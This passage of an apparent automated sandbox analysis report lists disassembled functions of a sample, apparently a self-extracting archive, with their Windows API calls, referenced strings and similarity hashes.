Part of subcall function 00BC7B08: CloseHandle.KERNEL32(?), ref: 00BC7B6C

Strings

SeSecurityPrivilege, xrefs: 00BC74F6
SeRestorePrivilege, xrefs: 00BC750B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 25f92ab1ef745eb4e6024134b59a14ba3a37ec7def4badcf96fd27382c1d29ec
Instruction ID: c31dc6eb28dc6975786651048dfacde3fb8a134cc77e0e6d71a4baddceeb5313
Opcode Fuzzy Hash: 25f92ab1ef745eb4e6024134b59a14ba3a37ec7def4badcf96fd27382c1d29ec
Instruction Fuzzy Hash: CD319571A44248AADF20EB689C41FFEBBE9EF15314F10409DF445A7292DB755A44CB60

Function 00BD9C00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00BC12D7: GetDlgItem.USER32(00000000,00003021), ref: 00BC131B
Part of subcall function 00BC12D7: SetWindowTextW.USER32(00000000,00BF22E4), ref: 00BC1331

EndDialog.USER32(?,00000001), ref: 00BD9C88
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BD9C9D
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BD9CB2

Strings

ASKNEXTVOL, xrefs: 00BD9C18

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 50b11b02bd87f7fe3bd32e9e1809aec671b871ad6e13972385f236bafe7e7d21
Instruction ID: 017f2e564ce4fbd06de0efd1e77057d552e3be921dcf0707b29153c20c98ef27
Opcode Fuzzy Hash: 50b11b02bd87f7fe3bd32e9e1809aec671b871ad6e13972385f236bafe7e7d21
Instruction Fuzzy Hash: 08119633610100BFD6119F68DD49FAAB7E9EF47700F084096F241A73B1D7A19956D725

Function 00BCCE9B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00BCCF06
_strncpy.LIBCMT ref: 00BCCF50

Strings

$%s, xrefs: 00BCCEFB
@%s, xrefs: 00BCCEF0

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 749f466e54470716d293e6a91afccafb2f860bc90cc7aac90aa579b07b8cf784
Instruction ID: a7bcbd8be03c6e24fec29ffa18d8d763ddaca6b994035bf40b09073be6fe7641
Opcode Fuzzy Hash: 749f466e54470716d293e6a91afccafb2f860bc90cc7aac90aa579b07b8cf784
Instruction Fuzzy Hash: 1E216F72440209AADB20DFA4CD45FEE7FE9EB15700F0000AAFA19961A1E771E659CB61

Function 00BDA123 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00BC12D7: GetDlgItem.USER32(00000000,00003021), ref: 00BC131B
Part of subcall function 00BC12D7: SetWindowTextW.USER32(00000000,00BF22E4), ref: 00BC1331

EndDialog.USER32(?,00000001), ref: 00BDA171
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BDA189
SetDlgItemTextW.USER32(?,00000067,?), ref: 00BDA1B7

Strings

GETPASSWORD1, xrefs: 00BDA13C

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 579a4d51f1516eacba6df086facc9efa0c723ce31d0e30784088832d4a4ccf17
Instruction ID: 0201a2a438d3b69357607138a8d34eb3648bfadf5794c10b08d52322aba5ca93
Opcode Fuzzy Hash: 579a4d51f1516eacba6df086facc9efa0c723ce31d0e30784088832d4a4ccf17
Instruction Fuzzy Hash: 9B11E532500218B6DB219E649C49FFAB7BCEB0BB10F000096FA45F32C0D6B1E95496A2

Function 00BCB254 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BCB27B

Part of subcall function 00BC3F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BC3F66

_wcschr.LIBVCRUNTIME ref: 00BCB299
_wcschr.LIBVCRUNTIME ref: 00BCB2A9

Strings

%c:\, xrefs: 00BCB271

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 97e5cb53129480c450eed4991253956a9bffc3dc45e4a9c278a7f1b221fce83b
Instruction ID: 047bff65ff2790ddc9025f8ff09d91f8a5a1e175af152b30bd2352a12fdafc97
Opcode Fuzzy Hash: 97e5cb53129480c450eed4991253956a9bffc3dc45e4a9c278a7f1b221fce83b
Instruction Fuzzy Hash: AF01B5635043116A9A20AB798C87E6FBBECFF95770F94849EF844CA181FB20D854C2E1

Function 00BD033D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(000001A0,00000000,?,?,?,00BCA909,00000008,00000000,?,?,00BCC89F,?,00000000,?,00000001,?), ref: 00BD0376
CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,?,?,00BCA909,00000008,00000000,?,?,00BCC89F,?,00000000), ref: 00BD0380
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BCA909,00000008,00000000,?,?,00BCC89F,?,00000000), ref: 00BD0390

Strings

Thread pool initialization failed., xrefs: 00BD03A8

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 8a407eb6f3935c52c6d6ac9a1f0ccc7a6ae5bcf92965ae7c2af70ff091c5cfd9
Instruction ID: c6ac403d1504f50383d91f3e2ffc7cbb7d33e3d59e6da2a680cefa0a558f8bae
Opcode Fuzzy Hash: 8a407eb6f3935c52c6d6ac9a1f0ccc7a6ae5bcf92965ae7c2af70ff091c5cfd9
Instruction Fuzzy Hash: B1111CB1641704AFD3206F659889BAAFBECEB55355F10486EE2DA83250DA716880CB24

Function 00BDC9C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00BDCA09, 00BDCA3B
RENAMEDLG, xrefs: 00BDCA1F

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: b4c680efb21b7fd644b474bd9a135c131e6d97786e5f86b07e22cf008ccbf13f
Instruction ID: 1516e7fa66766026b8786a0f0e962e837895c498cfbb953edea3fae838a4d2af
Opcode Fuzzy Hash: b4c680efb21b7fd644b474bd9a135c131e6d97786e5f86b07e22cf008ccbf13f
Instruction Fuzzy Hash: 64014C7264821AAFC705DB58EC40B6AFFD9E745794F0245A7F541A2230E262AC14DB61

Function 00BE87A4 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00BE882F
__alldvrm.LIBCMT ref: 00BE8A30
__alldvrm.LIBCMT ref: 00BE8A52

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 91f601f58f35083189bfd89023f53da505b71da698404290d48592a166104e54
Instruction ID: 99d634329701b3b033f712a79bfb4511a50585c1960a0fb20379a8d51738cfc0
Opcode Fuzzy Hash: 91f601f58f35083189bfd89023f53da505b71da698404290d48592a166104e54
Instruction Fuzzy Hash: 15A13575D04AC69FEB21CF1AC8917BEBBE5EF51310F1841EAD8899B282DB388D41C751

Function 00BCA03A Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00BC7FC2,?,?,?), ref: 00BCA0E0
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00BC7FC2,?,?), ref: 00BCA124
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00BC7FC2,?,?,?,?,?,?,?,?), ref: 00BCA1A5
CloseHandle.KERNEL32(?,?,00000000,?,00BC7FC2,?,?,?,?,?,?,?,?,?,?,?), ref: 00BCA1AC

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: ebc2fd8666c1651d951c0f2791df7397867e2867d35c78723dcb0f88ed60f013
Instruction ID: 3332adafe1115dcdff82d8b4302c6011178721902f63ba373e41fec8d55e2d1f
Opcode Fuzzy Hash: ebc2fd8666c1651d951c0f2791df7397867e2867d35c78723dcb0f88ed60f013
Instruction Fuzzy Hash: DE41CE316483859AE721DF34DC45FEBBBE8AF81748F08099DB5E0E31C0D665AA48DB53

Function 00BEB645 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,47E85006,00BE3546,00000000,00000000,00BE457B,?,00BE457B,?,00000001,00BE3546,47E85006,00000001,00BE457B,00BE457B), ref: 00BEB692
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BEB71B
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BEB72D
__freea.LIBCMT ref: 00BEB736

Part of subcall function 00BE7B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BE3006,?,0000015D,?,?,?,?,00BE44E2,000000FF,00000000,?,?), ref: 00BE7B32

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 7098eb90ec3d0868d4b098ac22fcad2d17a80e0bb19f6e8c44f8f05c956828cd
Instruction ID: c874566774fd888a08d7ee241993a36dcf91ef5f588b1c501bae91cf694d556f
Opcode Fuzzy Hash: 7098eb90ec3d0868d4b098ac22fcad2d17a80e0bb19f6e8c44f8f05c956828cd
Instruction Fuzzy Hash: F031B072A1024AAFDF259F66DC85DAF7BE5EB40710B0401A9FC14DB250EB35DD50CBA0

Function 00BDA553 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00BDA563
GetObjectW.GDI32(00000000,00000018,?), ref: 00BDA584
DeleteObject.GDI32(00000000), ref: 00BDA5AC
DeleteObject.GDI32(00000000), ref: 00BDA5CB

Part of subcall function 00BD96AD: FindResourceW.KERNEL32(00000066,PNG,?,?,00BDA5A5,00000066), ref: 00BD96BE
Part of subcall function 00BD96AD: SizeofResource.KERNEL32(00000000,751E5780,?,?,00BDA5A5,00000066), ref: 00BD96D6
Part of subcall function 00BD96AD: LoadResource.KERNEL32(00000000,?,?,00BDA5A5,00000066), ref: 00BD96E9
Part of subcall function 00BD96AD: LockResource.KERNEL32(00000000,?,?,00BDA5A5,00000066), ref: 00BD96F4

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID:
API String ID: 142272564-0
Opcode ID: 5ad0d78148e6cea2d699f9d209f5cd66ab14c5568ed048b94f4a295765c9e387
Instruction ID: ce6f100a3a05f36c0d81bffcfdd81dce2117a28885c2cbf02b2a5e4d76dfb82c
Opcode Fuzzy Hash: 5ad0d78148e6cea2d699f9d209f5cd66ab14c5568ed048b94f4a295765c9e387
Instruction Fuzzy Hash: D401F23268020567CA113768AC42F7FF6EEDB95B65F0902A2BD00A7391FE228C01D2A1

Function 00BE1AC7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00BE1ADE

Part of subcall function 00BE2116: ___AdjustPointer.LIBCMT ref: 00BE2160

_UnwindNestedFrames.LIBCMT ref: 00BE1AF5
___FrameUnwindToState.LIBVCRUNTIME ref: 00BE1B07
CallCatchBlock.LIBVCRUNTIME ref: 00BE1B2B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: e3da2a47c8b844266460c9267bddc60f008fad40a125ee031368b8d419d6242b
Instruction ID: 91f54b151b58585f8d4964536e3703ce0e553a6d796e576524ea90c7cdfa468a
Opcode Fuzzy Hash: e3da2a47c8b844266460c9267bddc60f008fad40a125ee031368b8d419d6242b
Instruction Fuzzy Hash: 34014032000149FBCF129F5ACC01EEA7BBAFF48754F144455FD1862120D772E861EBA0

Function 00BE15E6 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00BE15E6
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00BE15EB
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00BE15F0

Part of subcall function 00BE26CE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00BE26DF

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00BE1605

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: ddf0adde804129e3e3aff551b43878df0a9a162d909846b3bb4641761f25f26c
Instruction ID: e7fc2fa201524bd7d463541a6d6257bc691f9b397c84a0d6d91541bea3085243
Opcode Fuzzy Hash: ddf0adde804129e3e3aff551b43878df0a9a162d909846b3bb4641761f25f26c
Instruction Fuzzy Hash: 79C002A81046C5981C243BBF22026A903C95DA6785BB028E1FD52261135F29080B6832

Function 00BD97D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00BD9682: GetDC.USER32(00000000), ref: 00BD9686
Part of subcall function 00BD9682: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BD9691
Part of subcall function 00BD9682: ReleaseDC.USER32(00000000,00000000), ref: 00BD969C

GetObjectW.GDI32(?,00000018,?), ref: 00BD9801

Part of subcall function 00BD99C7: GetDC.USER32(00000000), ref: 00BD99D0
Part of subcall function 00BD99C7: GetObjectW.GDI32(?,00000018,?), ref: 00BD99FF
Part of subcall function 00BD99C7: ReleaseDC.USER32(00000000,?), ref: 00BD9A93

Strings

(, xrefs: 00BD98CC

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 63fe19d65523b3029e4c14777485c6c32a2608a5ffb194af6d23d2f282913e12
Instruction ID: b45bad3cef190883db87f1d8a60eaca5e5728c59b6784ab2e9ca187798879f2a
Opcode Fuzzy Hash: 63fe19d65523b3029e4c14777485c6c32a2608a5ffb194af6d23d2f282913e12
Instruction Fuzzy Hash: 0C6124B1204201AFD714DF64C884E6BBBE9FF89744F10495EF59ACB260DB31E905CBA2

Function 00BD0AC7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BD0C81

Strings

%s: %s, xrefs: 00BD0C90
%ls, xrefs: 00BD0B06, 00BD0B1C

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: abea6975781ca7dc03bdcaf37110cbee25b20bbac2cc6d6250c537f253b84902
Instruction ID: da2dc63054847ea16e060688250eccb93250a5b04a80ab1a19a8f74839906d0f
Opcode Fuzzy Hash: abea6975781ca7dc03bdcaf37110cbee25b20bbac2cc6d6250c537f253b84902
Instruction Fuzzy Hash: C0516A316BC704FAE6203AA48D82F75F6D5EB18F04F308AD7F787686E0F5926510E616

Function 00BE9E9E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BEA00A

Part of subcall function 00BE7E31: IsProcessorFeaturePresent.KERNEL32(00000017,00BE7E20,00000016,00BE7B5E,0000002C,00BFAA30,00BEAFC3,?,?,?,00BE7E2D,00000000,00000000,00000000,00000000,00000000), ref: 00BE7E33
Part of subcall function 00BE7E31: GetCurrentProcess.KERNEL32(C0000417,00BE7B5E,00000016,00BE85F4), ref: 00BE7E55
Part of subcall function 00BE7E31: TerminateProcess.KERNEL32(00000000), ref: 00BE7E5C

Strings

., xrefs: 00BEA1C1
*?, xrefs: 00BE9EE1

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
